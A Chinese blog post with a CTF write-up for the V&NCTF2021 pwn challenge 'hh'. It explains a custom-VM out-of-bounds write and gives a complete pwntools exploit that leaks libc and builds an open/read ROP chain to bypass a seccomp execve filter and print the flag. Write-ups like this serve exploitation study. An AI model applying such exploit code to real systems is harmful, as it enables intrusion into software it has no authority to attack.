V&NCTF2021 几个题解writeup

最新推荐文章于 2024-05-30 00:14:00 发布
最新推荐文章于 2024-05-30 00:14:00 发布
阅读量738 收藏
点赞数
分类专栏: ctf V&NCTF 文章标签: 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wdearzh/article/details/114982599
版权
ctf 同时被 2 个专栏收录
14 篇文章 1 订阅
订阅专栏
V&NCTF
1 篇文章 0 订阅
订阅专栏

pwn-hh

在ida中查看,先输入somethings然后去exec_code。

看到使用了prctl,使用seccomp-tools查看,屏蔽了execve,可以构造ORW

kali@kali:~/ctf/pwn/ti/hh$ seccomp-tools dump ./hh
 line  CODE  JT   JF      K
=================================
 0000: 0x20 0x00 0x00 0x00000004  A = arch
 0001: 0x15 0x00 0x05 0xc000003e  if (A != ARCH_X86_64) goto 0007
 0002: 0x20 0x00 0x00 0x00000000  A = sys_number
 0003: 0x35 0x00 0x01 0x40000000  if (A < 0x40000000) goto 0005
 0004: 0x15 0x00 0x02 0xffffffff  if (A != 0xffffffff) goto 0007
 0005: 0x15 0x01 0x00 0x0000003b  if (A == execve) goto 0007
 0006: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0007: 0x06 0x00 0x00 0x00000000  return KILL

exec_code,自定义的虚拟机,9的话是push, 0xa b  可以越界读  0xc d可以越界写。

使用push和越界写,构造rop,先泄露libc,再构造orw。

exp:

#encoding=utf-8
#自定义虚拟机
from pwn import *
context(os='linux',arch='amd64')
#context.log_level = 'debug'
path='/home/kali/ctf/pwn/ti/hh/'
#r = process(path+'hh')
#r = process([path+"ld-2.23.so",path+'hh'],env={"LD_PRELOAD":path+'libc.so.6'})
r = remote('node3.buuoj.cn',25897)
elf = ELF(path+'hh')  
libc = ELF(path+'libc.so.6')  
poprdi_addr = 0x4011A3
#poprsi_addr = 0x4011A1
main_addr = 0x401084
puts_plt=elf.plt['puts']
puts_got=elf.got['puts']

def addrop(val):   
    global idx,payload
    payload+=p32(vpush)+p32(val&0xffffffff)+p32(vstore)+p32(idx)
    idx+=1
    payload+=p32(vpush)+p32((val>>32)&0xffffffff)+p32(vstore)+p32(idx)
    idx+=1
vpush  = 0x9
vstore = 0xd
#puts put_addr
payload=b''
idx=(0x1F50+0x8)//4
addrop(poprdi_addr)
addrop(puts_got)
addrop(puts_plt)
addrop(main_addr)
r.sendlineafter('Give me you choice :\n', '1')
r.sendlineafter('code:', payload)
r.sendlineafter('Give me you choice :\n', '2')

#puts_addr = u64(r.recvuntil('\x7f')[-6:].ljust(8, b'\x00'))
puts_addr=u64(r.recvline().rstrip().ljust(8,b'\x00'))
print("puts_addr:"+hex(puts_addr))

base_addr= puts_addr - libc.symbols['puts']
print("base_addr:"+hex(base_addr))
open_addr=base_addr+ libc.symbols['open']
read_addr=base_addr+ libc.symbols['read']
write_addr=base_addr+ libc.symbols['write']
poprdx_addr  = base_addr + 0x0000000000001b92 
pushrax_addr = base_addr + 0x0000000000010f40
poprsi_addr  = base_addr + 0x00000000000202f8

# open("flag", 0);   
# read(3, buf, 64);
# write(1, buf, 64);
# puts(buf)

buf_addr = 0x602060 

payload=b''
idx=(0x1F50+0x8)//4
flag_addr_off = 480
rbuf_addr = buf_addr+flag_addr_off+4
#read('flag', 0?2)  
addrop(poprdi_addr)
addrop(buf_addr+flag_addr_off+4)
addrop(poprsi_addr)
addrop(0x0)
addrop(open_addr)

#read(3, buf, 64)  
addrop(poprdi_addr)
addrop(3)
addrop(poprsi_addr)
addrop(rbuf_addr)
addrop(poprdx_addr)
addrop(64)
addrop(read_addr)
'''
#write(1, buf, 64) p64(poprdi_addr)+ p64(2)+p64(poprsi_addr)+ p64(bss())+p64(poprdx_addr)+ p64(10)+p64(read_addr)
addrop(poprdi_addr)
addrop(1)
addrop(poprsi_addr)
addrop(rbuf_addr)
addrop(poprdx_addr)
addrop(64)
addrop(write_addr)
'''
##puts:(buf) p64(poprdi_addr)+ p64(buff_addr)+p64(put_addr)
addrop(poprdi_addr)
addrop(rbuf_addr)
addrop(puts_plt)
print('flag_addr_off:'+str(len(payload)))
payload+=p32(16)+p32(0x67616c66)+p32(0) #flag数据,地址可以计算,在前面填入

#gdb.attach(r, 'b *0x4011A3')
r.sendlineafter('Give me you choice :\n', '1')
r.sendlineafter('code:', payload)
r.sendlineafter('Give me you choice :\n', '2')
r.interactive()

 

丶拾光_w4ngz
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
NCTF 南京邮电大学网络攻防训练平台 WriteUp
4ct10n
08-02 8万+
NCTF 南京邮电大学网络攻防训练平台 WriteUp不说什么直接上题解WEB1.签到题(50)直接查看网页源码 Flag:nctf{flag_admiaanaaaaaaaaaaa}2.md5 collision(50)源码如下:<?php $md51 = md5('QNKCDZO'); $a = @$_GET['a']; $md52 = @md5($a); if(isset($a)){ i
【F2C】NCTF 南邮攻防平台 Write Up
KANITAN___的博客
11-19 533
说在前面 大部分参考:NCTF 南京邮电大学网络攻防训练平台 WriteUp 做题网址:CG-CTF (做得还蛮好的,只是里面时不时出现某同学的名字实在好出戏) 里面的解答比较全,不过我有几题没写出来,以后做出来了会更新。 刚接触CTF,很多东西不懂,只是为了做个笔记,比较适合新入门的同胞们看,老鸟们……求指导啊!
【CTF WriteUp】2021 starCTF部分Crypto题解
cccchhhh6819的博客
01-18 4258
(打比赛感想:大佬真TM多。。。) Crypto Crypto-GuessKey 题目 from random import randint import os from flag import flag N=64 key=randint(0,2**N) print key key=bin(key)[2:].rjust(N,'0') count=0 while True: p=0 q=0 new_key='' zeros=[0] for j in range(len(key)): if key
南京邮电大学CG-CTF平台Writeup
Gard3nia的博客
02-03 3149
前言 萌新刷题,寒假又补充更新了Crypto部分; 正文 Web题解 文件包含 1.直接包含内有运行代码的文件 &lt;?php include $_GET['file']; ?&gt; 那么就可以通过抓包修改file值的办法去运行一些本来不该运行的文件也可以通过此方法直接输出一些敏感的配置文件和远程包含shell(需要目标主机开启allow_url_fopen) 2.通过PHP内置协议直接...
SDUT_CTF_WEB题目writeup
至臻求学,胸怀云月
10-08 4664
平台链接http://sctf.sdutislab.cn/challenges 闲的没事做了做实验室自己搭的平台,把web题目writeup放出来签到题右键查看源代码芝麻开门 输入口令:zhimakaimen 那就输呗 结果发现 zhimakaimen是11位,但是输入框最大允许输入10位 f12改一下前端验证把最后一个n输进去,flag就出来了 层层递进看源代码之后,iframe奇怪!
BUUCTF web writeup
热门推荐
stepone4ward的博客
09-11 2万+
buuctf题目的部分writeup,持续更新中
H&NCTF 2024 Re 全解WP(带附件加详细解析)
最新发布
一个啥也不会的小菜鸡!
05-30 881
一共要交互128次的样子,flag就被输出了!# 解密 base64 字符串# 寻找匹配的字节序列# 如果找到匹配的字节序列= -1:# 寻找等于0x34的数据的下一个数据index = match_index + 3 # 匹配字节序列之后的索引while len(extracted_data) < 0x18: # 提取0x18个元素if decoded_data[index] == 0x34: # 如果当前数据等于0x34。
南邮 逆向 部分题解
木槿华年的博客
08-24 3207
转自: https://blog.csdn.net/xiangshangbashaonian/article/details/78878876 Hello,RE! 首先可以看到提示如下     我还是查了一下 无壳 提示用IDA 那我们就载入 shift+f12查找字符串 在ida浏览A界面选定要查看的函数,按f5看到了伪代码, 于是点击字符串按R转化为其实际值 ...
NJCTF2017 线上赛 web 题解 By Assassin
Assassin
03-18 6980
Login打开以后出现一个登陆页面,下面有一个注册用户的链接。 打开申请界面 看着申请的密码还有要求不知道是不是题目的关键点。 我们先申请一个账号登陆一下看看,发现是这样的 尝试申请一下admin发现已经存在了那么本题的知识点是mysql变量名在输入太长的时候会被截断!!那么我们就可以构造不是admin但是阶段后是admin的用户名payload: username=admin
H&NCTF2024-Re-RWhackA(病毒程序逆向分析)
05-29
H&NCTF2024-Re-RWhackA(病毒程序逆向分析)
H&NCTF2024-Re-Ezshoping(网络商城apk抓包逆向)
05-26
H&NCTF2024-Re-Ezshoping(网络商城apk抓包逆向)
2024NCTF部分题目资源包
02-06
作为国内TOP CTF战队,Nu1LTeam自2015年10月成立以来,斩获了国内外众多赛事冠军以及闯入DEFCON CTF总决赛,这得益于Nu1L每一位队员的努力。 我们期望发掘以及培养年轻力量,于是自2023年开始,我们决定举办N1CTF ...
harmonyos2-Inn0vHackti0n.github.io:Inn0vHackti0nCTF团队网站
07-01
是一个静态站点生成器,一个开源工具,用于创建各种形状和大小的简单而强大的网站。 如何安装/运行 这个存储库。 克隆它: git clone 。 如果您对 jekyll 完全陌生,请阅读更多关于 和 的内容。 将您的目录更改为...
hgame2023 week2 writeup
02-03 7254
hgame2023 week2
HSC-1th writeup
02-21 4969
HSC-1th 2022
wmctf2020-记录-writeup
08-03 4155
easy_re 题目描述:The flag is hidden in the perl code, can you find it? 使用ida打开发现是个64位的程序,看题目应该是perl脚本转成的exe程序,网上搜了下perl反编译得工具没有找到。 执行了一下如图: 使用ida查看字符串也没有找到 这俩字符串,点了动态调试,(以前没用过ida的动态调试, olldbg没法调试64位程序) 考虑应该会将perl代码加载到内存中,随便点了一些 提取内存快照后 搜索字符串找到了...
hgame2023 week1 writeup
01-15 3984
hgame2023 WEEK1
[NCTF2019]SQLi
07-28
\[NCTF2019\]SQLi是一个CTF比赛中的题目,涉及到SQL注入。根据引用\[1\]和引用\[2\]的内容,可以得知在该题目中,通过构造特定的SQL语句,可以绕过过滤,获取到管理员的密码,从而获得flag。具体的解题思路是通过不断尝试不同的字符,构造SQL语句进行盲注,判断是否成功绕过过滤。引用\[3\]提供了一个Python脚本的示例,可以用来自动化进行尝试。该脚本通过构造不同长度的payload,逐位尝试密码的每一位字符,直到获取到完整的密码。 #### 引用[.reference_title] - *1* [[NCTF2019]SQLi --BUUCTF --详解](https://blog.csdn.net/l2872253606/article/details/125265138)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [[NCTF2019]SQLi(Regexp注入)](https://blog.csdn.net/weixin_45669205/article/details/116137824)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [[NCTF2019]SQLi](https://blog.csdn.net/shinygod/article/details/124100832)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

丶拾光_w4ngz

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值